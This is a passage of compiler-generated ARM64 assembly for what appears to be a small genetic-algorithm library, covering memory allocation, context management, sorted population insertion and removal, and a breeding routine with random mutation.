x0, [x29, #-12] bl _malloc str x0, [sp, #8] ldr x0, [sp, #8] ldursw x2, [x29, #-12] mov w1, #0 mov x3, #-1 bl ___memset_chk ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _lga_realloc ; -- Begin function lga_realloc .p2align 2 _lga_realloc: ; @lga_realloc .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] str w1, [sp, #4] ldr x0, [sp, #8] ldrsw x1, [sp, #4] bl _realloc ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _lga_newctx ; -- Begin function lga_newctx .p2align 2 _lga_newctx: ; @lga_newctx .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _lga_nctx@GOTPAGE ldr x8, [x8, _lga_nctx@GOTPAGEOFF] str x8, [sp, #32] ; 8-byte Folded Spill stur w0, [x29, #-8] stur w1, [x29, #-12] mov w8, #184 stur w8, [x29, #-20] mov w8, #8 stur w8, [x29, #-24] ldur w0, [x29, #-20] bl _lga_malloc adrp x8, _lga_ctx@PAGE str x0, [x8, _lga_ctx@PAGEOFF] ldur w9, [x29, #-8] ldr x10, [x8, _lga_ctx@PAGEOFF] str w9, [x10, #44] ldur w9, [x29, #-12] ldr x10, [x8, _lga_ctx@PAGEOFF] str w9, [x10, #40] ldr x8, [x8, _lga_ctx@PAGEOFF] fmov s0, #1.00000000 str s0, [x8, #52] stur wzr, [x29, #-16] b LBB8_1 LBB8_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-16] subs w8, w8, #16 cset w8, ge tbnz w8, #0, LBB8_4 b LBB8_2 LBB8_2: ; in Loop: Header=BB8_1 Depth=1 adrp x8, _lga_ctx@PAGE ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldursw x10, [x29, #-16] mov w11, #54437 movk w11, #21352, lsl #16 fmov s0, w11 str s0, [x9, x10, lsl #2] ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #120 ldursw x9, [x29, #-16] fmov s0, #1.00000000 str s0, [x8, x9, lsl #2] b LBB8_3 LBB8_3: ; in Loop: Header=BB8_1 Depth=1 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB8_1 LBB8_4: ldur w8, [x29, #-8] ldur w9, [x29, #-12] mul w9, w8, w9 ; implicit-def: $x8 mov x8, x9 sxtw x8, w8 lsl x8, x8, #2 mov x0, x8 bl _lga_malloc adrp x8, _lga_ctx@PAGE str x8, [sp, #24] ; 8-byte Folded Spill ldr x8, [x8, _lga_ctx@PAGEOFF] str x0, [x8] ldursw x8, [x29, #-8] lsl x8, x8, #2 mov x0, x8 bl _lga_malloc ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x8, [x8, _lga_ctx@PAGEOFF] str x0, [x8, #16] ldursw x8, [x29, #-8] lsl x8, x8, #2 mov x0, x8 bl _lga_malloc ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x8, [x8, _lga_ctx@PAGEOFF] str x0, [x8, #24] ldursw x8, [x29, #-8] lsl x8, x8, #2 mov x0, x8 bl _lga_malloc ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x8, [x8, _lga_ctx@PAGEOFF] str x0, [x8, #8] adrp x8, _lga_ctx_arr@PAGE ldr x8, [x8, _lga_ctx_arr@PAGEOFF] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB8_6 b LBB8_5 LBB8_5: ldur w9, [x29, #-24] mov w8, #4096 str w8, [sp, #20] ; 4-byte Folded Spill mul w0, w8, w9 bl _lga_malloc ldr x9, [sp, #32] ; 8-byte Folded Reload ldr w8, [sp, #20] ; 4-byte Folded Reload adrp x10, _lga_ctx_arr@PAGE str x0, [x10, _lga_ctx_arr@PAGEOFF] str w8, [x9] b LBB8_6 LBB8_6: stur wzr, [x29, #-16] b LBB8_7 LBB8_7: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #32] ; 8-byte Folded Reload ldur w8, [x29, #-16] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB8_12 b LBB8_8 LBB8_8: ; in Loop: Header=BB8_7 Depth=1 adrp x8, _lga_ctx_arr@PAGE ldr x8, [x8, _lga_ctx_arr@PAGEOFF] ldursw x9, [x29, #-16] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB8_10 b LBB8_9 LBB8_9: adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] adrp x9, _lga_ctx_arr@PAGE ldr x9, [x9, _lga_ctx_arr@PAGEOFF] ldursw x10, [x29, #-16] str x8, [x9, x10, lsl #3] ldur w8, [x29, #-16] stur w8, [x29, #-4] b LBB8_13 LBB8_10: ; in Loop: Header=BB8_7 Depth=1 b LBB8_11 LBB8_11: ; in Loop: Header=BB8_7 Depth=1 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB8_7 LBB8_12: ldr x8, [sp, #32] ; 8-byte Folded Reload ldr w9, [x8] stur w9, [x29, #-16] ldr w10, [x8] ldr w9, [x8] add w9, w9, w10, asr #1 str w9, [x8] adrp x9, _lga_ctx_arr@PAGE str x9, [sp, #8] ; 8-byte Folded Spill ldr x0, [x9, _lga_ctx_arr@PAGEOFF] ldr w8, [x8] ldur w9, [x29, #-24] mul w1, w8, w9 bl _lga_realloc ldr x8, [sp, #32] ; 8-byte Folded Reload ldr x9, [sp, #8] ; 8-byte Folded Reload str x0, [x9, _lga_ctx_arr@PAGEOFF] ldr x9, [x9, _lga_ctx_arr@PAGEOFF] ldursw x10, [x29, #-16] add x0, x9, x10, lsl #3 ldr w8, [x8] ldur w9, [x29, #-16] subs w8, w8, w9 ldur w9, [x29, #-24] mul w9, w8, w9 ; implicit-def: $x8 mov x8, x9 sxtw x2, w8 mov w1, #0 mov x3, #-1 bl ___memset_chk ldr x9, [sp, #8] ; 8-byte Folded Reload adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr x9, [x9, _lga_ctx_arr@PAGEOFF] ldursw x10, [x29, #-16] str x8, [x9, x10, lsl #3] ldur w8, [x29, #-16] stur w8, [x29, #-4] b LBB8_13 LBB8_13: ldur w0, [x29, #-4] ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _lga_newctx_max ; -- Begin function lga_newctx_max .p2align 2 _lga_newctx_max: ; @lga_newctx_max .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str w1, [sp, #8] ldur w0, [x29, #-4] ldr w1, [sp, #8] bl _lga_newctx str w0, [sp, #4] adrp x8, _lga_ctx@PAGE ldr x9, [x8, _lga_ctx@PAGEOFF] mov w8, #1 str w8, [x9, #48] ldr w0, [sp, #4] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _lga_bind ; -- Begin function lga_bind .p2align 2 _lga_bind: ; @lga_bind .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #8] ldr w8, [sp, #8] subs w8, w8, #0 cset w8, lt tbnz w8, #0, LBB10_2 b LBB10_1 LBB10_1: ldr w8, [sp, #8] adrp x9, _lga_nctx@GOTPAGE ldr x9, [x9, _lga_nctx@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB10_3 b LBB10_2 LBB10_2: ; kill: def $x8 killed $xzr adrp x8, _lga_ctx@PAGE str xzr, [x8, _lga_ctx@PAGEOFF] mov w8, #-1 str w8, [sp, #12] b LBB10_4 LBB10_3: adrp x8, _lga_ctx_arr@PAGE ldr x8, [x8, _lga_ctx_arr@PAGEOFF] ldrsw x9, [sp, #8] ldr x9, [x8, x9, lsl #3] adrp x8, _lga_ctx@PAGE str x9, [x8, _lga_ctx@PAGEOFF] ldr x8, [x8, _lga_ctx@PAGEOFF] subs x8, x8, #0 cset w8, ne and w8, w8, #0x1 ands w8, w8, #0x1 csetm w8, eq str w8, [sp, #12] b LBB10_4 LBB10_4: ldr w0, [sp, #12] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _lga_lpc_swap ; -- Begin function lga_lpc_swap .p2align 2 _lga_lpc_swap: ; @lga_lpc_swap .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str w0, [sp, #28] str w1, [sp, #24] ldr w8, [sp, #28] ldr w9, [sp, #24] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB11_2 b LBB11_1 LBB11_1: b LBB11_3 LBB11_2: adrp x9, _lga_ctx@PAGE str x9, [sp] ; 8-byte Folded Spill ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x10, [sp, #28] ldr s0, [x8, x10, lsl #2] str s0, [sp, #12] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x10, [sp, #24] ldr s0, [x8, x10, lsl #2] str s0, [sp, #8] ldr s0, [sp, #8] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x10, [sp, #28] str s0, [x8, x10, lsl #2] ldr s0, [sp, #12] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x10, [sp, #24] str s0, [x8, x10, lsl #2] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #24] ldrsw x10, [sp, #28] ldr w8, [x8, x10, lsl #2] str w8, [sp, #20] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #24] ldrsw x10, [sp, #24] ldr w8, [x8, x10, lsl #2] str w8, [sp, #16] ldr w8, [sp, #16] ldr x10, [x9, _lga_ctx@PAGEOFF] ldr x10, [x10, #24] ldrsw x11, [sp, #28] str w8, [x10, x11, lsl #2] ldr w8, [sp, #20] ldr x9, [x9, _lga_ctx@PAGEOFF] ldr x9, [x9, #24] ldrsw x10, [sp, #24] str w8, [x9, x10, lsl #2] b LBB11_3 LBB11_3: add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function lga_breed_raw lCPI12_0: .quad 0x3fa999999999999a ; double 0.050000000000000003 lCPI12_1: .quad 0x3fb999999999999a ; double 0.10000000000000001 .section __TEXT,__text,regular,pure_instructions .globl _lga_breed_raw .p2align 2 _lga_breed_raw: ; @lga_breed_raw .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] str x2, [sp, #24] str w3, [sp, #20] str s0, [sp, #16] str wzr, [sp, #4] b LBB12_1 LBB12_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #4] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB12_6 b LBB12_2 LBB12_2: ; in Loop: Header=BB12_1 Depth=1 bl _lga_nfrand str s0, [sp, #12] ldur x8, [x29, #-8] ldrsw x9, [sp, #4] ldr s0, [x8, x9, lsl #2] ldr s2, [sp, #12] fmov s1, #1.00000000 fsub s1, s1, s2 ldur x8, [x29, #-16] ldrsw x9, [sp, #4] ldr s2, [x8, x9, lsl #2] ldr s3, [sp, #12] fmul s2, s2, s3 fmadd s0, s0, s1, s2 str s0, [sp, #8] bl _lga_ssqrrand fcvt d0, s0 adrp x8, lCPI12_1@PAGE ldr d1, [x8, lCPI12_1@PAGEOFF] fmul d0, d0, d1 ldr s1, [sp, #16] fcvt d1, s1 ldr s2, [sp, #8] fcvt d2, s2 fmadd d0, d0, d1, d2 fcvt s0, d0 str s0, [sp, #8] bl _lga_nfrand str s0, [sp, #12] ldr s0, [sp, #12] fcvt d0, s0 ldr s1, [sp, #16] fcvt d2, s1 adrp x8, lCPI12_0@PAGE ldr d1, [x8, lCPI12_0@PAGEOFF] fmul d1, d1, d2 fcmp d0, d1 cset w8, pl tbnz w8, #0, LBB12_4 b LBB12_3 LBB12_3: ; in Loop: Header=BB12_1 Depth=1 bl _lga_sfrand fcvt d0, s0 fmov d1, #1.50000000 fmul d0, d0, d1 fcvt s0, d0 bl _lga_ssqrt ldr s1, [sp, #16] ldr s3, [sp, #16] fmov s2, #1.00000000 fsub s2, s2, s3 fmadd s1, s0, s1, s2 ldr s0, [sp, #8] fmul s0, s0, s1 str s0, [sp, #8] b LBB12_4 LBB12_4: ; in Loop: Header=BB12_1 Depth=1 ldr s0, [sp, #8] ldr x8, [sp, #24] ldrsw x9, [sp, #4] str s0, [x8, x9, lsl #2] b LBB12_5 LBB12_5: ; in Loop: Header=BB12_1 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB12_1 LBB12_6: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _lga_remove_idx ; -- Begin function lga_remove_idx .p2align 2 _lga_remove_idx: ; @lga_remove_idx .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str w0, [sp, #28] adrp x8, _lga_ctx@PAGE ldr x9, [x8, _lga_ctx@PAGEOFF] ldr x9, [x9, #8] ldrsw x10, [sp, #28] ldr w9, [x9, x10, lsl #2] str w9, [sp, #20] ldr x9, [x8, _lga_ctx@PAGEOFF] ldr w8, [x9, #36] subs w8, w8, #1 str w8, [x9, #36] str w8, [sp, #24] ldr w8, [sp, #20] str w8, [sp, #16] b LBB13_1 LBB13_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] ldr w9, [sp, #24] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB13_4 b LBB13_2 LBB13_2: ; in Loop: Header=BB13_1 Depth=1 adrp x9, _lga_ctx@PAGE ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldr w10, [sp, #16] add w10, w10, #1 ldr s0, [x8, w10, sxtw #2] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x10, [sp, #16] str s0, [x8, x10, lsl #2] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #24] ldr w10, [sp, #16] add w10, w10, #1 ldr w8, [x8, w10, sxtw #2] str w8, [sp, #12] ldr w8, [sp, #12] ldr x10, [x9, _lga_ctx@PAGEOFF] ldr x10, [x10, #24] ldrsw x11, [sp, #16] str w8, [x10, x11, lsl #2] ldr w8, [sp, #16] ldr x9, [x9, _lga_ctx@PAGEOFF] ldr x9, [x9, #8] ldrsw x10, [sp, #12] str w8, [x9, x10, lsl #2] b LBB13_3 LBB13_3: ; in Loop: Header=BB13_1 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB13_1 LBB13_4: add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _lga_insert_idx_min ; -- Begin function lga_insert_idx_min .p2align 2 _lga_insert_idx_min: ; @lga_insert_idx_min .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur s0, [x29, #-4] stur w0, [x29, #-8] str wzr, [sp, #16] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr w8, [x8, #36] asr w8, w8, #1 str w8, [sp, #12] b LBB14_1 LBB14_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB14_5 b LBB14_2 LBB14_2: ; in Loop: Header=BB14_1 Depth=1 ldur s0, [x29, #-4] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldr w9, [sp, #16] ldr w10, [sp, #12] add w9, w9, w10 ldr s1, [x8, w9, sxtw #2] fcmp s0, s1 cset w8, le tbnz w8, #0, LBB14_4 b LBB14_3 LBB14_3: ; in Loop: Header=BB14_1 Depth=1 ldr w9, [sp, #12] ldr w8, [sp, #16] add w8, w8, w9 str w8, [sp, #16] b LBB14_4 LBB14_4: ; in Loop: Header=BB14_1 Depth=1 ldr w8, [sp, #12] asr w8, w8, #1 str w8, [sp, #12] b LBB14_1 LBB14_5: b LBB14_6 LBB14_6: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] adrp x9, _lga_ctx@PAGE ldr x9, [x9, _lga_ctx@PAGEOFF] ldr w9, [x9, #36] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB14_11 b LBB14_7 LBB14_7: ; in Loop: Header=BB14_6 Depth=1 ldur s0, [x29, #-4] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x9, [sp, #16] ldr s1, [x8, x9, lsl #2] fcmp s0, s1 cset w8, hi tbnz w8, #0, LBB14_9 b LBB14_8 LBB14_8: b LBB14_11 LBB14_9: ; in Loop: Header=BB14_6 Depth=1 b LBB14_10 LBB14_10: ; in Loop: Header=BB14_6 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB14_6 LBB14_11: adrp x8, _lga_ctx@PAGE ldr x10, [x8, _lga_ctx@PAGEOFF] ldr w8, [x10, #36] add w9, w8, #1 str w9, [x10, #36] stur w8, [x29, #-12] ldur w8, [x29, #-12] str w8, [sp, #12] b LBB14_12 LBB14_12: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] ldr w9, [sp, #16] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB14_15 b LBB14_13 LBB14_13: ; in Loop: Header=BB14_12 Depth=1 adrp x9, _lga_ctx@PAGE ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldr w10, [sp, #12] subs w10, w10, #1 ldr s0, [x8, w10, sxtw #2] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x10, [sp, #12] str s0, [x8, x10, lsl #2] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #24] ldr w10, [sp, #12] subs w10, w10, #1 ldr w8, [x8, w10, sxtw #2] str w8, [sp, #8] ldr w8, [sp, #8] ldr x10, [x9, _lga_ctx@PAGEOFF] ldr x10, [x10, #24] ldrsw x11, [sp, #12] str w8, [x10, x11, lsl #2] ldr w8, [sp, #12] ldr x9, [x9, _lga_ctx@PAGEOFF] ldr x9, [x9, #8] ldrsw x10, [sp, #8] str w8, [x9, x10, lsl #2] b LBB14_14 LBB14_14: ; in Loop: Header=BB14_12 Depth=1 ldr w8, [sp, #12] subs w8, w8, #1 str w8, [sp, #12] b LBB14_12 LBB14_15: ldur s0, [x29, #-4] adrp x9, _lga_ctx@PAGE ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x10, [sp, #16] str s0, [x8, x10, lsl #2] ldur w8, [x29, #-8] ldr x10, [x9, _lga_ctx@PAGEOFF] ldr x10, [x10, #24] ldrsw x11, [sp, #16] str w8, [x10, x11, lsl #2] ldr w8, [sp, #16] ldr x9, [x9, _lga_ctx@PAGEOFF] ldr x9, [x9, #8] ldursw x10, [x29, #-8] str w8, [x9, x10, lsl #2] bl _rand and w8, w0, #0xf str w8, [sp, #16] ldr w8, [sp, #16] str w8, [sp, #12] b LBB14_16 LBB14_16: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #15 cset w8, ge tbnz w8, #0, LBB14_19 b LBB14_17 LBB14_17: ; in Loop: Header=BB14_16 Depth=1 adrp x8, _lga_ctx@PAGE ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldr w10, [sp, #12] add w10, w10, #1 ldr s0, [x9, w10, sxtw #2] ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldrsw x10, [sp, #12] str s0, [x9, x10, lsl #2] ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #120 ldr w10, [sp, #12] add w10, w10, #1 ldr s0, [x9, w10, sxtw #2] ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #120 ldrsw x9, [sp, #12] str s0, [x8, x9, lsl #2] b LBB14_18 LBB14_18: ; in Loop: Header=BB14_16 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB14_16 LBB14_19: str wzr, [sp, #16] b LBB14_20 LBB14_20: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] subs w8, w8, #15 cset w8, ge tbnz w8, #0, LBB14_25 b LBB14_21 LBB14_21: ; in Loop: Header=BB14_20 Depth=1 ldur s0, [x29, #-4] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #56 ldrsw x9, [sp, #16] ldr s1, [x8, x9, lsl #2] fcmp s0, s1 cset w8, hi tbnz w8, #0, LBB14_23 b LBB14_22 LBB14_22: b LBB14_25 LBB14_23: ; in Loop: Header=BB14_20 Depth=1 b LBB14_24 LBB14_24: ; in Loop: Header=BB14_20 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB14_20 LBB14_25: mov w8, #15 str w8, [sp, #12] b LBB14_26 LBB14_26: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] ldr w9, [sp, #16] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB14_29 b LBB14_27 LBB14_27: ; in Loop: Header=BB14_26 Depth=1 adrp x8, _lga_ctx@PAGE ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldr w10, [sp, #12] subs w10, w10, #1 ldr s0, [x9, w10, sxtw #2] ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldrsw x10, [sp, #12] str s0, [x9, x10, lsl #2] ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #120 ldr w10, [sp, #12] subs w10, w10, #1 ldr s0, [x9, w10, sxtw #2] ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #120 ldrsw x9, [sp, #12] str s0, [x8, x9, lsl #2] b LBB14_28 LBB14_28: ; in Loop: Header=BB14_26 Depth=1 ldr w8, [sp, #12] subs w8, w8, #1 str w8, [sp, #12] b LBB14_26 LBB14_29: ldur s0, [x29, #-4] adrp x8, _lga_ctx@PAGE ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldrsw x10, [sp, #16] str s0, [x9, x10, lsl #2] ldr x9, [x8, _lga_ctx@PAGEOFF] ldr s0, [x9, #52] ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #120 ldrsw x9, [sp, #16] str s0, [x8, x9, lsl #2] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _lga_insert_idx_max ; -- Begin function lga_insert_idx_max .p2align 2 _lga_insert_idx_max: ; @lga_insert_idx_max .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur s0, [x29, #-4] stur w0, [x29, #-8] str wzr, [sp, #16] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr w8, [x8, #36] asr w8, w8, #1 str w8, [sp, #12] b LBB15_1 LBB15_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB15_5 b LBB15_2 LBB15_2: ; in Loop: Header=BB15_1 Depth=1 ldur s0, [x29, #-4] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldr w9, [sp, #16] ldr w10, [sp, #12] add w9, w9, w10 ldr s1, [x8, w9, sxtw #2] fcmp s0, s1 cset w8, pl tbnz w8, #0, LBB15_4 b LBB15_3 LBB15_3: ; in Loop: Header=BB15_1 Depth=1 ldr w9, [sp, #12] ldr w8, [sp, #16] add w8, w8, w9 str w8, [sp, #16] b LBB15_4 LBB15_4: ; in Loop: Header=BB15_1 Depth=1 ldr w8, [sp, #12] asr w8, w8, #1 str w8, [sp, #12] b LBB15_1 LBB15_5: b LBB15_6 LBB15_6: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] adrp x9, _lga_ctx@PAGE ldr x9, [x9, _lga_ctx@PAGEOFF] ldr w9, [x9, #36] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB15_11 b LBB15_7 LBB15_7: ; in Loop: Header=BB15_6 Depth=1 ldur s0, [x29, #-4] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x9, [sp, #16] ldr s1, [x8, x9, lsl #2] fcmp s0, s1 cset w8, lt tbnz w8, #0, LBB15_9 b LBB15_8 LBB15_8: b LBB15_11 LBB15_9: ; in Loop: Header=BB15_6 Depth=1 b LBB15_10 LBB15_10: ; in Loop: Header=BB15_6 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB15_6 LBB15_11: adrp x8, _lga_ctx@PAGE ldr x10, [x8, _lga_ctx@PAGEOFF] ldr w8, [x10, #36] add w9, w8, #1 str w9, [x10, #36] stur w8, [x29, #-12] ldur w8, [x29, #-12] str w8, [sp, #12] b LBB15_12 LBB15_12: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] ldr w9, [sp, #16] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB15_15 b LBB15_13 LBB15_13: ; in Loop: Header=BB15_12 Depth=1 adrp x9, _lga_ctx@PAGE ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldr w10, [sp, #12] subs w10, w10, #1 ldr s0, [x8, w10, sxtw #2] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x10, [sp, #12] str s0, [x8, x10, lsl #2] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #24] ldr w10, [sp, #12] subs w10, w10, #1 ldr w8, [x8, w10, sxtw #2] str w8, [sp, #8] ldr w8, [sp, #8] ldr x10, [x9, _lga_ctx@PAGEOFF] ldr x10, [x10, #24] ldrsw x11, [sp, #12] str w8, [x10, x11, lsl #2] ldr w8, [sp, #12] ldr x9, [x9, _lga_ctx@PAGEOFF] ldr x9, [x9, #8] ldrsw x10, [sp, #8] str w8, [x9, x10, lsl #2] b LBB15_14 LBB15_14: ; in Loop: Header=BB15_12 Depth=1 ldr w8, [sp, #12] subs w8, w8, #1 str w8, [sp, #12] b LBB15_12 LBB15_15: ldur s0, [x29, #-4] adrp x9, _lga_ctx@PAGE ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldrsw x10, [sp, #16] str s0, [x8, x10, lsl #2] ldur w8, [x29, #-8] ldr x10, [x9, _lga_ctx@PAGEOFF] ldr x10, [x10, #24] ldrsw x11, [sp, #16] str w8, [x10, x11, lsl #2] ldr w8, [sp, #16] ldr x9, [x9, _lga_ctx@PAGEOFF] ldr x9, [x9, #8] ldursw x10, [x29, #-8] str w8, [x9, x10, lsl #2] bl _rand and w8, w0, #0xf str w8, [sp, #16] ldr w8, [sp, #16] str w8, [sp, #12] b LBB15_16 LBB15_16: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #15 cset w8, ge tbnz w8, #0, LBB15_19 b LBB15_17 LBB15_17: ; in Loop: Header=BB15_16 Depth=1 adrp x8, _lga_ctx@PAGE ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldr w10, [sp, #12] add w10, w10, #1 ldr s0, [x9, w10, sxtw #2] ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldrsw x10, [sp, #12] str s0, [x9, x10, lsl #2] ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #120 ldr w10, [sp, #12] add w10, w10, #1 ldr s0, [x9, w10, sxtw #2] ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #120 ldrsw x9, [sp, #12] str s0, [x8, x9, lsl #2] b LBB15_18 LBB15_18: ; in Loop: Header=BB15_16 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB15_16 LBB15_19: str wzr, [sp, #16] b LBB15_20 LBB15_20: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] subs w8, w8, #15 cset w8, ge tbnz w8, #0, LBB15_25 b LBB15_21 LBB15_21: ; in Loop: Header=BB15_20 Depth=1 ldur s0, [x29, #-4] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #56 ldrsw x9, [sp, #16] ldr s1, [x8, x9, lsl 